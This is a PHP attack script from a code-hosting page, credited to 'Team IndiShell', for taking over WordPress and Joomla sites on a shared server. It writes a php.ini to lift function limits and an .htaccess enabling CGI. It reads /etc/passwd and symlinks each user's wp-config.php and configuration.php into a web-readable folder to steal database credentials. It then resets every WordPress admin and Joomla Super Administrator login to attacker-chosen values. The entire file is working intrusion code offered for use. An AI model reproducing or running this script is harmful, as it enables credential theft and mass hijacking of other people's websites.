-
Notifications
You must be signed in to change notification settings - Fork 36
/
Code_breaker_ICA_wordpress_mass_password_changer.php
392 lines (331 loc) · 12.5 KB
/
Code_breaker_ICA_wordpress_mass_password_changer.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
<?php
$head = '
<html>
<head>
</script>
<title>--==[[Code breaker ICA wordpress/joomla mass username/password changer By Team IndiShell]]==--</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<STYLE>
body {
background-image: url("http://geektech.in/wp-content/uploads/2011/07/40906_136291719754164_100001200112272_190608_3706908_n.jpg");
background-position: center center;
background-repeat: no-repeat;
background-size: 400px 650px;
background-color: #000000;
background-attachment: fixed;
font-family: Tahoma
}
tr {
BORDER: dashed 1px #333;
color: #FFF;
}
td {
BORDER: dashed 1px #333;
color: #FFF;
}
.table1 {
BORDER: 0px Black;
BACKGROUND-COLOR: Black;
color: #FFF;
}
.td1 {
BORDER: 0px;
BORDER-COLOR: #333333;
font: 7pt Verdana;
color: Green;
}
.tr1 {
BORDER: 0px;
BORDER-COLOR: #333333;
color: #FFF;
}
table {
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
BACKGROUND-COLOR: Black;
color: #FFF;
}
input {
border : solid 2px;
border-color : #333;
BACKGROUND-COLOR: white;
font: 10pt comic sans ms;
color: black;
}
select {
BORDER-RIGHT: Black 2px solid;
BORDER-TOP: #DF0000 1px solid;
BORDER-LEFT: #DF0000 1px solid;
BORDER-BOTTOM: Black 1px solid;
BORDER-color: #FFF;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
submit {
BORDER: buttonhighlight 2px outset;
BACKGROUND-COLOR: Black;
width: 40%;
color: white;
}
textarea {
border : dashed 2px #333;
BACKGROUND-COLOR: Black;
font: Fixedsys bold;
color: #999;
}
BODY {
SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
margin: 1px;
color: Red;
background-color: Black;
}
.main {
margin : -287px 0px 0px -490px;
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
}
.tt {
background-color: Black;
}
A:link {
COLOR: White; TEXT-DECORATION: none
}
A:visited {
COLOR: White; TEXT-DECORATION: none
}
A:hover {
color: Red; TEXT-DECORATION: none
}
A:active {
color: Red; TEXT-DECORATION: none
}
</STYLE>
<script language=\'javascript\'>
function hide_div(id)
{
document.getElementById(id).style.display = \'none\';
document.cookie=id+\'=0;\';
}
function show_div(id)
{
document.getElementById(id).style.display = \'block\';
document.cookie=id+\'=1;\';
}
function change_divst(id)
{
if (document.getElementById(id).style.display == \'none\')
show_div(id);
else
hide_div(id);
}
</script>'; ?>
<html>
<head>
<?php
echo $head ;
echo '
<div align=center><font color=white font size=4><marquee behavior="scroll" direction="left" scrollamount="2" scrolldelay="3" width="50%"><span class="footerlink">Special f**k goes to my best buddy "Suriya CyberTyson" <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/4.gif></span></marquee><br></font></div>
<table width="100%" cellspacing="0" cellpadding="0" class="tb1" >
<td width="100%" align=center valign="top" rowspan="1">
<font color=#ff9933 size=5 face="comic sans ms"><b>--==[[ Code Breaker ICA ]]==--</font><font color=white size=5 face="comic sans ms"><b><br> <font color=#ff9933 size=5 face="comic sans ms">--==[[ <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/4.gif> w0rdpress/joomla mass </font><font color=white size=5 face="comic sans ms">admin panel username/password </font><font color=green size=5 face="comic sans ms"><b>changer By Team IndiShell <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/4.gif> ]]==--</font> <div class="hedr">
<td height="10" align="left" class="td1"></td></tr><tr><td
width="100%" align="center" valign="top" rowspan="1"><font
color="red" face="comic sans ms"size="1"><b>
<font color=#ff9933>
################################################</font><font color=white>################################################</font><font color=green>################################################</font><br><font color=white>-==[[Greetz to]]==--</font><br> <font color=#ff9933>Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba ,Silent poison India,Magnum sniper,Atul Dwivedi,ethicalnoob Indishell,Local root indishell,Irfninja indishell<br>Reborn India,cool toad,cool shavik,Alicks,Ebin V Thomas,Dinelson Amine,Th3 D3str0yer,SKSking,Mr. Trojan,rad paul,Godzila,mike waals,zoo,cyber warrior,Neo hacker ICA<br>Suriya Prakash,cyber gladiator,Cyber Ace, Golden boy INDIA,Ketan Singh,Yash,,Aneesh DograAR AR,saad abbasi,hero,Minhal Mehdi ,Raj bhai ji , Hacking queen ,lovetherisk and rest of TEAM INDISHELL<br>
<font color=white>--==[[Love to]]==--</font><br># My Father , my Ex Teacher,cold fire hacker,Mannu, ViKi ,Soldier Of God, Bhuppi,Mohit, Ffe ^_^,Ashish,Shardhanand ,Budhaoo<br>
<font color=white>--==[[Interface Desgined By]]==--</font><br><font color=red>GCE College ke DON :D</font><br><font color=#ff9933>
################################################</font><font color=white>#################################################</font><font color=green>################################################</font>
</table>
</table>
';
?>
<body bgcolor=black><h3 style="text-align:center">
<form method=post><font color=white size=3 face="comic sans ms">Bhai ji ,Run php.ini first of all :) <br>The button given below generates php.ini file :)</font><br>
<input type=submit name=ini value="use to Generate PHP.ini" /></form>
<?php
if(isset($_POST['ini']))
{
$r=fopen('php.ini','w');
$rr=" disbale_functions=none ";
fwrite($r,$rr);
$link="<a href=php.ini><font color=white size=2 face=\"comic sans ms\"><u>open this link in new tab to run PHP.INI</u></font></a>";
echo $link;
echo "<br>";
}
?>
<font size=4>--==[[ </font><a href="<?php echo '?whole'; ?>"><font color=white size=4 face="comic sans ms">change user/pass for whole server</font></a> ]]==--</font><br>
<?php
if(isset($_GET['whole']))
{
echo "<font color=white size=3 face=\"comic sans ms\">bhai ji ,select your target type(whether you want to change uname/pass for wordpress , joomla or for both) <br> fill the username/password that you want to set for admin panels :)<br><form method=post><font color=white size=3 face=\"comic sans ms\">";
?><div align=center><table width=30% border=0px>
<tr>
<td align=center width=50%>
<form method=post><font color=#ff9933 size=4 face="comic sans ms">
wordpress: <input type="checkbox" name="config[]" value="wp"><br>
joomla: <input type="checkbox" name="config[]" value="joomla"><br>
</td></tr></table>
username:<input type=text name=uname value=Team><br>
Password:<input type=text name=pass value=INDISHELL></font><p>
<input type=submit name=start value="start 8-)"></form>
<p>
<?php
}
?>
<?php
error_reporting(0);
function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
{
$ar0=explode($marqueurDebutLien, $text);
$ar1=explode($marqueurFinLien, $ar0[1]);
$ar=trim($ar1[0]);
return $ar;
}
function data($lu)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $lu);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
$result['EXE'] = curl_exec($ch);
curl_close($ch);
return $result['EXE'];
}
?>
<?php
set_time_limit(0);
if(isset($_POST['start']))
{
$uname=$_POST['uname'];
$pass=$_POST['pass'];
///////////////////////
///// Htaccess /////////
///////////////////////
mkdir('Indishell',0777);
$rr = " <Files *.php>
ForceType application/x-httpd-php4
</Files>
Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .ica
AddHandler cgi-script .ica
AddHandler cgi-script .ica";
$g = fopen('Indishell/.htaccess','w');
fwrite($g,$rr);
/////////////////////////
///////username//////////
/////////////////////////
$users=file("/etc/passwd");
foreach($users as $user)
{
$str=explode(":",$user);
$us=$str[0];
$u=trim($us);
$r="Indishell/";
symlink('/home/'.$u.'/public_html/wp-config.php',$r.$u.'..wp-config');
symlink('/home/'.$u.'/public_html/wordpress/wp-config.php',$r.$u.'..word-wp');
symlink('/home/'.$u.'/public_html/blog/wp-config.php',$r.$u.'..wpblog');
symlink('/home/'.$u.'/public_html/configuration.php',$r.$u.'..joomla-or-whmcs');
symlink('/home/'.$u.'/public_html/joomla/configuration.php',$r.$u.'..joomla');
}
$link= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/Indishell/";
$re=$link;
////////////////////////
///username extractor///
////////////////////////
if(!empty($_POST['config']))
{
$users=file("/etc/passwd");
foreach($users as $user)
{
$str=explode(":",$user);
$usersss=$str[0];
foreach($_POST['config'] as $check)
{
////////////////
///wordpress////
////////////////
if($check == "wp")
{
$wpc=array("..wp-config","..word-wp","..wpblog");
foreach($wpc as $wpcon)
{
$finalurl=$re.$usersss.$wpcon;
$content=data($finalurl);
if($content && preg_match('/table_prefix/i',$content))
{
echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's website cms is wordpress </font></td></tr></table>";
$uname=$_POST['uname'];
$dbu=entre2v2($content,"define('DB_USER', '","');");
$dbp=entre2v2($content,"define('DB_PASSWORD', '","');");
$dbn=entre2v2($content,"define('DB_NAME', '","');");
$tp=entre2v2($content,"$table_prefix = '","'");
$npwd= md5($pass);
$host="localhost";
$dbconnect=@ mysql_connect($host,$dbu,$dbp);
$dbselect=@ mysql_select_db($dbn,$dbconnect);
if($dbselect)
{
echo "<font color=red>database $dbn has been selected<br>";
$ru=@ mysql_query("UPDATE ".$tp."users SET user_login ='".$uname."' , user_pass ='".$npwd."' ") ;
$req =mysql_query("SELECT * from `".$tp."options` WHERE option_name='home'");
$data = mysql_fetch_array($req);
$site_url=$data["option_value"];
echo "website is ".$data["option_value"];
if(!$ru)
{
echo "<font size=2 color=red face='comic sans ms'><br>could not update username/password :P</font>";
}
else {
echo "<div align=center><table width=60% boorder=1><tr><td align=center><font size=3 color=red face='comic sans ms'>bhai ji,username $uname and password $pass has been updated for ID=1 :D</font></td></tr></table><br>";
}
}
}
}
}
////////////
// joomla //
////////////
if($check == "joomla")
{
$joomlac=array("..joomla-or-whmcs","..joomla");
foreach($joomlac as $joomlacon)
{
$finalurl=$re.$usersss.$joomlacon;
$content=data($finalurl);
if($content && preg_match('/dbprefix/i',$content))
{
echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's website cms is joomla </font></td></tr></table>";
$uname=$_POST['uname'];
$dbu=entre2v2($content,"user = '","';");
$dbp=entre2v2($content,"password = '","';");
$dbn=entre2v2($content,"db = '","';");
$dp=entre2v2($content,"dbprefix = '","';");
$np= md5($pass);
$host="localhost";
$dbconnect=@ mysql_connect($host,$dbu,$dbp);
$dbselect=@ mysql_select_db($dbn,$dbconnect);
if($dbselect)
{
echo "<font color=red>database $dbn has been selected<br>";
$run =@mysql_query("UPDATE `".$dp."users` SET username ='".$uname."' , password ='".$np."' WHERE usertype ='Super Administrator'");
$run =@mysql_query("UPDATE `".$dp."users` SET username ='".$uname."' , password ='".$np."' WHERE usertype = 'deprecated'");
if(!$run)
{
echo "<font size=2 color=white face='comic sans ms'><br>something went wrong :P";
}
else {
echo "<div align=center><table width=60% boorder=1><tr><td align=center><font size=3 color=red face='comic sans ms'>bhai ji,username $uname and password $pass has been updated for ID=1 :D</font></td></tr></table><br>";
}
}
}
}
}
}
}
}
}
?>